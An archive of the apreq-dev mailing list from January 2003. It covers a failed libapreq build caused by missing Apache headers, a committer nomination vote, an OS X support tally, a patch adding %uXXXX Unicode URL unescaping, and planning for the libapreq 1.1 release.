member `upload' in something not a structure or union apache_request.c:471: request for member `upload_hook' in something not a structure or union apache_request.c:475: dereferencing pointer to incomplete type apache_request.c:476: dereferencing pointer to incomplete type apache_request.c:476: request for member `r' in something not a structure or union apache_request.c:477: dereferencing pointer to incomplete type apache_request.c:477: request for member `r' in something not a structure or union apache_request.c:483: request for member `remaining' in something not a structure or union apache_request.c:488: request for member `upload_hook' in something not a structure or union apache_request.c:489: request for member `upload_hook' in something not a structure or union apache_request.c:489: request for member `hook_data' in something not a structure or union apache_request.c:491: dereferencing pointer to incomplete type apache_request.c:496: dereferencing pointer to incomplete type apache_request.c:499: dereferencing pointer to incomplete type apache_request.c:499: dereferencing pointer to incomplete type apache_request.c:500: dereferencing pointer to incomplete type apache_request.c: At top level: apache_request.c:535: parse error before "expire_calc" apache_request.c: In function `expire_calc': apache_request.c:562: `NULL' undeclared (first use in this function) apache_request.c: At top level: apache_request.c:566: parse error before '*' token apache_request.c: In function `ApacheUtil_expires': apache_request.c:568: `time_t' undeclared (first use in this function) apache_request.c:568: parse error before "when" apache_request.c:570: `type' undeclared (first use in this function) apache_request.c:572: `time_str' undeclared (first use in this function) apache_request.c:573: `NULL' undeclared (first use in this function) apache_request.c:576: `when' undeclared (first use in this function) apache_request.c:579: `p' undeclared (first use in this function) apache_request.c:579: warning: return makes pointer from integer without a cast apache_request.c:582: warning: assignment makes pointer from integer without a cast apache_request.c:585: `ap_day_snames' undeclared (first use in this function) apache_request.c:585: dereferencing pointer to incomplete type apache_request.c:586: dereferencing pointer to incomplete type apache_request.c:586: `ap_month_snames' undeclared (first use in this function) apache_request.c:586: dereferencing pointer to incomplete type apache_request.c:587: dereferencing pointer to incomplete type apache_request.c:588: dereferencing pointer to incomplete type apache_request.c:588: dereferencing pointer to incomplete type apache_request.c:588: dereferencing pointer to incomplete type apache_request.c:588: warning: return makes pointer from integer without a cast apache_request.c: At top level: apache_request.c:591: parse error before '*' token apache_request.c: In function `ApacheRequest_expires': apache_request.c:593: request for member `r' in something not a structure or union apache_request.c:593: `time_str' undeclared (first use in this function) make[1]: *** [apache_request.o] Error 1 make[1]: Leaving directory `/backup/_All_RPM's_&_.tar.gz/templatetoolkit/libapreq-1.0/c' make: *** [subdirs] Error 2 ]0;[email protected]: /backup/_All_RPM's_&_.tar.gz/templatetoolkit/libapreq-1.0 [andrew@localhost libapreq-1.0]$ Script done on Fri Jan 24 12:38:00 2003 ################################################# From [email protected] Fri Jan 24 02:36:08 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72893 invoked by uid 500); 24 Jan 2003 02:36:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 72878 invoked from network); 24 Jan 2003 02:36:07 -0000 Message-ID: <[email protected]> Date: Fri, 24 Jan 2003 13:29:02 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Cc: [email protected] Subject: Re: Problem making libapreq on Mandrake 9.0 References: <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: 161.129.204.104.available.above.net 1.6.2 0/1000/N Andrew Lord wrote: > Hi, > > I am having trouble making libapreq (from version 1.0 or 0.33). The platform > is Linux (Mandrake 9.0) and a script of the printout is shown below. I would > be grateful for any pointers as to the likely cause of the problem I'm > experiencing. you don't have the Apache header files installed. Either re-install Apache from source, or install the devel rpm of apache. > `/backup/_All_RPM's_&_.tar.gz/templatetoolkit/libapreq-1.0/c' > gcc -c -D_REENTRANT -D_GNU_SOURCE -fno-strict-aliasing -D_LARGEFILE_SOURCE > -D_FILE_OFFSET_BITS=64 -I/usr/include/gdbm -O3 -fomit-frame-pointer -pipe > -mcpu=pentiumpro -march=i586 -ffast-math -fno-strength-reduce > -DVERSION=\"\" -DXS_VERSION=\"\" -fpic > "-I/usr/lib/perl5/5.8.0/i386-linux-thread-multi/CORE" apache_request.c > In file included from apache_request.c:59: > apache_request.h:5:19: httpd.h: No such file or directory > apache_request.h:6:25: http_config.h: No such file or directory > apache_request.h:7:23: http_core.h: No such file or directory > apache_request.h:8:22: http_log.h: No such file or directory > apache_request.h:9:23: http_main.h: No such file or directory > apache_request.h:10:27: http_protocol.h: No such file or directory > apache_request.h:11:25: util_script.h: No such file or directory __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Fri Jan 24 03:35:39 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5793 invoked by uid 500); 24 Jan 2003 03:35:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 5753 invoked from network); 24 Jan 2003 03:35:33 -0000 Content-Type: text/plain; charset="iso-8859-1" From: Andrew Lord <[email protected]> Reply-To: [email protected] To: [email protected] Subject: Re: Problem making libapreq on Mandrake 9.0 Date: Fri, 24 Jan 2003 14:07:48 +1030 User-Agent: KMail/1.4.3 References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <[email protected]> X-Spam-Rating: 161.129.204.104.available.above.net 1.6.2 0/1000/N On Fri, 24 Jan 2003 12:59 pm, Stas Bekman wrote: Hi Stas, Thankyou very much for the pointer and for the quickness of your response to my question. I'm currently downloading fresh packages and hopefully a reinstall will see the problem solved. Cheers, Andrew Lord > you don't have the Apache header files installed. Either re-install Apache > from source, or install the devel rpm of apache. > > > `/backup/_All_RPM's_&_.tar.gz/templatetoolkit/libapreq-1.0/c' > > gcc -c -D_REENTRANT -D_GNU_SOURCE -fno-strict-aliasing > > -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -I/usr/include/gdbm -O3 > > -fomit-frame-pointer -pipe -mcpu=pentiumpro -march=i586 -ffast-math > > -fno-strength-reduce > > -DVERSION=\"\" -DXS_VERSION=\"\" -fpic > > "-I/usr/lib/perl5/5.8.0/i386-linux-thread-multi/CORE" apache_request.c > > In file included from apache_request.c:59: > > apache_request.h:5:19: httpd.h: No such file or directory > > apache_request.h:6:25: http_config.h: No such file or directory > > apache_request.h:7:23: http_core.h: No such file or directory > > apache_request.h:8:22: http_log.h: No such file or directory > > apache_request.h:9:23: http_main.h: No such file or directory > > apache_request.h:10:27: http_protocol.h: No such file or directory > > apache_request.h:11:25: util_script.h: No such file or directory > > __________________________________________________________________ > Stas Bekman JAm_pH ------> Just Another mod_perl Hacker > http://stason.org/ mod_perl Guide ---> http://perl.apache.org > mailto:[email protected] http://use.perl.org http://apacheweek.com > http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Fri Jan 24 21:32:54 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13400 invoked by uid 500); 24 Jan 2003 21:32:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 13381 invoked from network); 24 Jan 2003 21:32:53 -0000 To: apreq list <[email protected]> Subject: [NOMINATION] Issac Goldstand From: Joe Schaefer <[email protected]> Date: 24 Jan 2003 16:39:24 -0500 Message-ID: <[email protected]> Lines: 8 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: 161.129.204.104.available.above.net 1.6.2 0/1000/N Issac Goldstand should be a committer to httpd-apreq*. He has accrued boku merit here over a very long period of time, and the recognition he deserves is long overdue. -- Joe Schaefer From [email protected] Fri Jan 24 22:26:30 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 53277 invoked by uid 500); 24 Jan 2003 22:26:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 53264 invoked from network); 24 Jan 2003 22:26:29 -0000 Date: Fri, 24 Jan 2003 16:26:27 -0600 Subject: Re: [NOMINATION] Issac Goldstand Content-Type: text/plain; charset=US-ASCII; format=flowed Mime-Version: 1.0 (Apple Message framework v551) From: Jay Buffington <[email protected]> To: [email protected] Content-Transfer-Encoding: 7bit In-Reply-To: <[email protected]> Message-Id: <[email protected]> X-Mailer: Apple Mail (2.551) X-Spam-Rating: 161.129.204.104.available.above.net 1.6.2 0/1000/N *LURK MODE: OFF* I second that. I've been doing some work with his Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUploadMeter and it was a wonderful resource for me. I appreciate the time and effort he has donated. Thanks Issac! Jay On Friday, January 24, 2003, at 03:39 PM, Joe Schaefer wrote: > > Issac Goldstand should be a committer to httpd-apreq*. > He has accrued boku merit here over a very long > period of time, and the recognition he deserves is > long overdue. > > -- > Joe Schaefer From [email protected] Sun Jan 26 17:39:38 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22555 invoked by uid 500); 26 Jan 2003 17:39:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 22542 invoked from network); 26 Jan 2003 17:39:37 -0000 To: apreq list <[email protected]> Subject: Re: [proposal/vote] OS X support References: <[email protected]> From: Joe Schaefer <[email protected]> Date: 26 Jan 2003 12:46:19 -0500 In-Reply-To: Joe Schaefer's message of "07 Dec 2002 09:15:44 -0500" Message-ID: <[email protected]> Lines: 55 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Joe Schaefer <[email protected]> writes on December 7, 2002: > For the good of the project and our existing users, I think we > should press forward with a release of libapreq-1.1. [...] > People interested in furthering apreq development should > vote on the following > > -------------------------------------------------- > ITEM: > > Let's offer support for libapreq on OS X, but not > for the mod_perl API. > > +1: AGREED, lets go. > 0: Don't really care. > -1: NO, and I will work to fix this problem RIGHT NOW. > -------------------------------------------------- Tally of votes: +1: Joe, Randy, Stas, Issac 0: <nobody> -1: <nobody> I couldn't find a record of David Welton's vote in the archives, so I assume he abstained. As far as I am concerned, those 5 people ARE the active developers on apreq-dev, and they ALL should have equal weight applied to their votes. Of those 5, only Issac is without committer status. We can fix that by voting him in as a committer, but I think it requires three +1 votes from the other committers. The current list of committers is available online: http://incubator.apache.org/whoweare.html httpd-apreq -------------------- David Welton Doug MacEachern Jim Winstead Joe Schaefer Matt Sergeant Randy Kobes Rasmus Lerdorf Stas Bekman -------------------- -- Joe Schaefer From [email protected] Sun Jan 26 18:02:54 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 36053 invoked by uid 500); 26 Jan 2003 18:02:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 36042 invoked from network); 26 Jan 2003 18:02:53 -0000 To: apreq list <[email protected]> Subject: Re: [proposal/vote] OS X support References: <[email protected]> <[email protected]> From: [email protected] (David N. Welton) Date: 26 Jan 2003 10:03:07 -0800 In-Reply-To: <[email protected]> Message-ID: <[email protected]> Lines: 25 User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Joe Schaefer <[email protected]> writes: > Tally of votes: > +1: Joe, Randy, Stas, Issac > 0: <nobody> > -1: <nobody> > I couldn't find a record of David Welton's vote in the archives, so > I assume he abstained. Sure, I'm not really a Perl guy:-) > Of those 5, only Issac is without committer status. We can fix that > by voting him in as a committer, but I think it requires three +1 > votes from the other committers. Ok, +1 from me, then - I trust you guys. -- David N. Welton Consulting: http://www.dedasys.com/ Personal: http://www.dedasys.com/davidw/ Free Software: http://www.dedasys.com/freesoftware/ Apache Tcl: http://tcl.apache.org/ From [email protected] Sun Jan 26 22:46:34 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59431 invoked by uid 500); 26 Jan 2003 22:46:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 59407 invoked from network); 26 Jan 2003 22:46:32 -0000 Date: Sun, 26 Jan 2003 16:40:47 -0600 (CST) From: Randy Kobes <[email protected]> To: Joe Schaefer <[email protected]> cc: apreq list <[email protected]> Subject: Re: [proposal/vote] OS X support In-Reply-To: <[email protected]> Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N On 26 Jan 2003, Joe Schaefer wrote: [ .. ] > Of those 5, only Issac is without committer status. > We can fix that by voting him in as a committer, but I > think it requires three +1 votes from the other committers. +1 for me. -- best regards, randy From [email protected] Tue Jan 28 12:32:47 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16319 invoked by uid 500); 28 Jan 2003 12:32:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 16281 invoked from network); 28 Jan 2003 12:32:45 -0000 Date: Tue, 28 Jan 2003 21:32:43 +0900 Message-ID: <[email protected]> From: IKEBE Tomohiro <[email protected]> To: Tatsuhiko Miyagawa <[email protected]> Cc: [email protected], apreq list <[email protected]> Subject: Re: ap_unescape_url can't escape %uXXXX In-Reply-To: <[email protected]> References: <[email protected]> User-Agent: Wanderlust/2.11.1 (Wonderwall) Emacs/21.1 Mule/5.0 (SAKAKI) Organization: Livin' On The EDGE, Co.,Ltd. MIME-Version: 1.0 (generated by SEMI 1.14.3 - "Ushinoya") Content-Type: multipart/mixed; boundary="Multipart_Tue_Jan_28_21:32:43_2003-1" X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N --Multipart_Tue_Jan_28_21:32:43_2003-1 Content-Type: text/plain; charset=US-ASCII I have written a little patch for libapreq which unescape the %uXXXX style URI-escaped string. the unescape algorithm is based on CGI.pm At Fri, 29 Nov 2002 06:55:54 +0900, Tatsuhiko Miyagawa wrote: > > It seems that Apache's ap_unescape_url() can't handle %uXXXX style > URI-escaped Unicode string, hence Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest cannot neighther, > while CGI.pm can. > > Is this a known issue? > > > -- > Tatsuhiko Miyagawa <[email protected]> > -- IKEBE Tomohiro <[email protected]> --Multipart_Tue_Jan_28_21:32:43_2003-1 Content-Type: application/octet-stream; type=patch Content-Disposition: attachment; filename="apache_request_unicode.patch" Content-Transfer-Encoding: base64 LS0tIGxpYmFwcmVxLTEuMC9jL2FwYWNoZV9yZXF1ZXN0LmMJVHVlIEZlYiAxOSAwMTo0ODoyNyAy MDAyCisrKyBsaWJhcHJlcS0xLjAubmV3L2MvYXBhY2hlX3JlcXVlc3QuYwlUdWUgSmFuIDI4IDIw OjE3OjM0IDIwMDMKQEAgLTI0OCw2ICsyNDgsMTE3IEBACiAKICAgICByZXR1cm4gTlVMTDsKIH0K K3N0YXRpYyBjaGFyIHgyYyhjb25zdCBjaGFyICp3aGF0KQoreworICAgIHJlZ2lzdGVyIGNoYXIg ZGlnaXQ7CisKKyNpZm5kZWYgQ0hBUlNFVF9FQkNESUMKKyAgICBkaWdpdCA9ICgod2hhdFswXSA+ PSAnQScpID8gKCh3aGF0WzBdICYgMHhkZikgLSAnQScpICsgMTAgOiAod2hhdFswXSAtICcwJykp Cis7CisgICAgZGlnaXQgKj0gMTY7CisgICAgZGlnaXQgKz0gKHdoYXRbMV0gPj0gJ0EnID8gKCh3 aGF0WzFdICYgMHhkZikgLSAnQScpICsgMTAgOiAod2hhdFsxXSAtICcwJykpOworI2Vsc2UgLypD SEFSU0VUX0VCQ0RJQyovCisgICAgY2hhciB4c3RyWzVdOworICAgIHhzdHJbMF09JzAnOworICAg IHhzdHJbMV09J3gnOworICAgIHhzdHJbMl09d2hhdFswXTsKKyAgICB4c3RyWzNdPXdoYXRbMV07 CisgICAgeHN0cls0XT0nXDAnOworICAgIGRpZ2l0ID0gb3NfdG9lYmNkaWNbMHhGRiAmIGFwX3N0 cnRvbCh4c3RyLCBOVUxMLCAxNildOworI2VuZGlmIC8qQ0hBUlNFVF9FQkNESUMqLworICAgIHJl dHVybiAoZGlnaXQpOworfQorCisKK3N0YXRpYyB1bnNpZ25lZCBpbnQgdXRmOF9jb252ZXJ0KGNo YXIgKnN0cikgeworICAgIGxvbmcgeCA9IDA7CisgICAgaW50IGkgPSAwOworICAgIHdoaWxlIChp IDwgNCApIHsKKwlpZiAoIGFwX2lzeGRpZ2l0KHN0cltpXSkgIT0gMCApIHsKKwkgICAgaWYoIGFw X2lzZGlnaXQoc3RyW2ldKSAhPSAwICkgeworCQl4ID0geCAqIDE2ICsgc3RyW2ldIC0gJzAnOwor CSAgICB9CisJICAgIGVsc2UgeworCQlzdHJbaV0gPSB0b2xvd2VyKCBzdHJbaV0gKTsKKwkJeCA9 IHggKiAxNiArIHN0cltpXSAtICdhJyArIDEwOworCSAgICB9CisJfQorCWVsc2UgeworCSAgICBy ZXR1cm4gMDsKKwl9CisJaSsrOworICAgIH0KKyAgICBpZihpIDwgMykKKwlyZXR1cm4gMDsKKyAg ICByZXR1cm4gKHgpOworfQorCitzdGF0aWMgaW50IGFwX3VuZXNjYXBlX3VybF91KGNoYXIgKnVy bCkKK3sKKyAgICByZWdpc3RlciBpbnQgeCwgeSwgYmFkZXNjLCBiYWRwYXRoOworCisgICAgYmFk ZXNjID0gMDsKKyAgICBiYWRwYXRoID0gMDsKKyAgICBmb3IgKHggPSAwLCB5ID0gMDsgdXJsW3ld OyArK3gsICsreSkgeworCWlmICh1cmxbeV0gIT0gJyUnKXsKKwkgICAgdXJsW3hdID0gdXJsW3ld OworCX0KKwllbHNlIHsKKwkgICAgaWYodXJsW3kgKyAxXSA9PSAndScgfHwgdXJsW3kgKyAxXSA9 PSAnVScpeworCQl1bnNpZ25lZCBpbnQgYyA9IHV0ZjhfY29udmVydCgmdXJsW3kgKyAyXSk7CisJ CXkgKz0gNTsKKwkJaWYoYyA8IDB4ODApeworCQkgICAgdXJsW3hdID0gYzsKKwkJfQorCQllbHNl IGlmKGMgPCAweDEwMDAwKXsKKwkJICAgIHVybFt4XSA9ICgweGUwIHwgKGMgPj4gMTIpKTsKKwkJ ICAgIHVybFsrK3hdID0gKDB4ODAgfCAoKGMgPj4gNikgJiAweDNmKSk7CisJCSAgICB1cmxbKyt4 XSA9ICgweDgwIHwgKGMgJiAweDNmKSk7CisJCX0KKwkJZWxzZSBpZihjIDwgMHgyMDAwMDApewor CQkgICAgdXJsW3hdID0gMHhmMCB8IChjID4+IDE4KTsKKwkJICAgIHVybFsrK3hdID0gMHg4MCB8 ICgoYyA+PiAxMikgJiAweDNmKTsKKwkJICAgIHVybFsrK3hdID0gMHg4MCB8ICgoYyA+PiA2KSAm IDB4M2YpOworCQkgICAgdXJsWysreF0gPSAweDgwIHwgKGMgJiAweDNmKTsKKwkJfQorCQllbHNl IGlmKGMgPCAweDQwMDAwMDApeworCQkgICAgdXJsW3hdID0gMHhmOCB8IChjID4+IDI0KTsKKwkJ ICAgIHVybFsrK3hdID0gMHg4MCB8ICgoYyA+PiAxOCkgJiAweDNmKTsKKwkJICAgIHVybFsrK3hd ID0gMHg4MCB8ICgoYyA+PiAxMikgJiAweDNmKTsKKwkJICAgIHVybFsrK3hdID0gMHg4MCB8ICgo YyA+PiA2KSAmIDB4M2YpOworCQkgICAgdXJsWysreF0gPSAweDgwIHwgKGMgJiAweDNmKTsKKwkJ fQorCQllbHNlIGlmKGMgPCAweDgwMDAwMDApeworCQkgICAgdXJsW3hdID0gMHhmZSB8IChjID4+ IDMwKTsKKwkJICAgIHVybFsrK3hdID0gMHg4MCB8ICgoYyA+PiAyNCkgJiAweDNmKTsKKwkJICAg IHVybFsrK3hdID0gMHg4MCB8ICgoYyA+PiAxOCkgJiAweDNmKTsKKwkJICAgIHVybFsrK3hdID0g MHg4MCB8ICgoYyA+PiAxMikgJiAweDNmKTsKKwkJICAgIHVybFsrK3hdID0gMHg4MCB8ICgoYyA+ PiA2KSAmIDB4M2YpOworCQkgICAgdXJsWysreF0gPSAweDgwIHwgKGMgJiAweDNmKTsKKwkJfQor CSAgICB9CisJICAgIGVsc2UgeworCQlpZiAoIWFwX2lzeGRpZ2l0KHVybFt5ICsgMV0pIHx8ICFh cF9pc3hkaWdpdCh1cmxbeSArIDJdKSkgeworCQkgICAgYmFkZXNjID0gMTsKKwkJICAgIHVybFt4 XSA9ICclJzsKKwkJfQorCQllbHNlIHsKKwkJICAgIHVybFt4XSA9IHgyYygmdXJsW3kgKyAxXSk7 CisJCSAgICB5ICs9IDI7CisJCSAgICBpZiAodXJsW3hdID09ICcvJyB8fCB1cmxbeF0gPT0gJ1ww JykKKwkJCWJhZHBhdGggPSAxOworCQl9CisJICAgIH0KKwl9CisgICAgfQorICAgIHVybFt4XSA9 ICdcMCc7CisgICAgaWYgKGJhZGVzYykKKwlyZXR1cm4gQkFEX1JFUVVFU1Q7CisgICAgZWxzZSBp ZiAoYmFkcGF0aCkKKwlyZXR1cm4gTk9UX0ZPVU5EOworICAgIGVsc2UKKwlyZXR1cm4gT0s7Cit9 CiAKIHN0YXRpYyB2b2lkIHNwbGl0X3RvX3Bhcm1zKEFwYWNoZVJlcXVlc3QgKnJlcSwgY29uc3Qg Y2hhciAqZGF0YSkKIHsKQEAgLTI1OCwxMCArMzY5LDkgQEAKIAljb25zdCBjaGFyICprZXkgPSBh cF9nZXR3b3JkKHItPnBvb2wsICZ2YWwsICc9Jyk7CiAKIAlyZXFfcGx1c3Rvc3BhY2UoKGNoYXIq KWtleSk7Ci0JYXBfdW5lc2NhcGVfdXJsKChjaGFyKilrZXkpOworCWFwX3VuZXNjYXBlX3VybF91 KChjaGFyKilrZXkpOwogCXJlcV9wbHVzdG9zcGFjZSgoY2hhciopdmFsKTsKLQlhcF91bmVzY2Fw ZV91cmwoKGNoYXIqKXZhbCk7Ci0KKwlhcF91bmVzY2FwZV91cmxfdSgoY2hhciopdmFsKTsKIAlh cF90YWJsZV9hZGQocmVxLT5wYXJtcywga2V5LCB2YWwpOwogICAgIH0KIAo= --Multipart_Tue_Jan_28_21:32:43_2003-1-- From [email protected] Tue Jan 28 15:54:08 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 29183 invoked by uid 500); 28 Jan 2003 15:54:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 47266 invoked from network); 28 Jan 2003 13:11:31 -0000 Date: Tue, 28 Jan 2003 14:10:53 +0100 From: Lee Goddard <[email protected]> X-Mailer: The Bat! (v1.62 Christmas Edition) UNREG / CD5BF9353B3B7091 Reply-To: Lee Goddard <[email protected]> Organization: LBL X-Priority: 3 (Normal) Message-ID: <{{EMAIL+PHONE}}> To: [email protected] CC: [email protected], [email protected], [email protected] Subject: Re[2]: ap_unescape_url can't escape %uXXXX In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Scanner: exiscan by Freestart X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N -----BEGIN PGP SIGNED MESSAGE----- Hash: MD5 Hi IKEBE, On Tuesday, January 28, 2003 at 1:32:43 PM, you wrote: IT> I have written a little patch for libapreq which unescape IT> the %uXXXX style URI-escaped string. IT> the unescape algorithm is based on CGI.pm Any idea if/when that'll be incorporated to the distributions? I currently have to have a handler check every incoming request for failure, and then convert with Unicoacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bString .... - -- Cheers Lee "Of course, if everyone used Lynx, this wouldn't be a problem" Goddard -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUAPjaBYadrfekeF/QBAQHDJgP/YnPgGH8c3emGgbwnuvAB3B2jIvnetcD0 2nyE4ODThKoRuITHRX5qa9FvHtz2ouNM+pgDr0wo6TRyJM7sqmpzXVy/0XYw6NUV j8nxkBiELC4F9JWyf+a91rzvTOA/eXDPizrOC9/OgKKn+ZH86GftoeNd+KvhM4TG kRmE6bJ5O+4= =ZPvi -----END PGP SIGNATURE----- From [email protected] Tue Jan 28 16:04:54 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42210 invoked by uid 500); 28 Jan 2003 16:04:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 42171 invoked from network); 28 Jan 2003 16:04:53 -0000 To: Lee Goddard <[email protected]> Cc: [email protected], [email protected], [email protected], [email protected] Subject: Re: Re[2]: ap_unescape_url can't escape %uXXXX References: <[email protected]> <[email protected]> <{{EMAIL+PHONE}}> From: Joe Schaefer <[email protected]> Date: 28 Jan 2003 11:11:35 -0500 In-Reply-To: Lee Goddard's message of "Tue, 28 Jan 2003 14:10:53 +0100" Message-ID: <[email protected]> Lines: 15 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Lee Goddard <[email protected]> writes: > Any idea if/when that'll be incorporated to the distributions? > > I currently have to have a handler check every incoming request > for failure, and then convert with Unicoacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bString .... It'll likely go into the next libapreq-1.X release, and be carried on to 2.X versions as well. 1.1 is now on its way to becoming official (I don't know if it'll ever appear on CPAN though), so there's nothing holding up further progress on httpd-apreq. -- Joe Schaefer From [email protected] Tue Jan 28 17:40:20 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 60427 invoked by uid 500); 28 Jan 2003 17:40:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 60229 invoked from network); 28 Jan 2003 17:40:01 -0000 Date: Tue, 28 Jan 2003 09:40:03 -0800 From: Jim Winstead <[email protected]> To: [email protected] Subject: 1.1 release Message-ID: <[email protected]> Mail-Followup-To: [email protected] Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N sorry i've been mia -- for doing the 1.1 release, the only part of the process that should require my involvement is the cpan release. if someone else would package up the build and put it out via the normal apache channels, i'll upload it to cpan. (in addition to getting it done sooner, this reduces the chances that i'll build the package with the wrong version of the autotools or make some other silly mistake.) and if any cpan experts want to let us in on how to let the responsibility for uploading to cpan can be shared, that would probably be good. jim From [email protected] Tue Jan 28 17:58:01 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76435 invoked by uid 500); 28 Jan 2003 17:58:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 76419 invoked from network); 28 Jan 2003 17:58:00 -0000 To: Jim Winstead <[email protected]> Cc: [email protected] Subject: Re: 1.1 release References: <[email protected]> From: Joe Schaefer <[email protected]> Date: 28 Jan 2003 13:04:46 -0500 In-Reply-To: Jim Winstead's message of "Tue, 28 Jan 2003 09:40:03 -0800" Message-ID: <[email protected]> Lines: 16 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Jim Winstead <[email protected]> writes: > if someone else would package up the build and put it out via the > normal apache channels, i'll upload it to cpan. (in addition to > getting it done sooner, this reduces the chances that i'll build the > package with the wrong version of the autotools or make some other > silly mistake.) The tarball is already on daedalus: 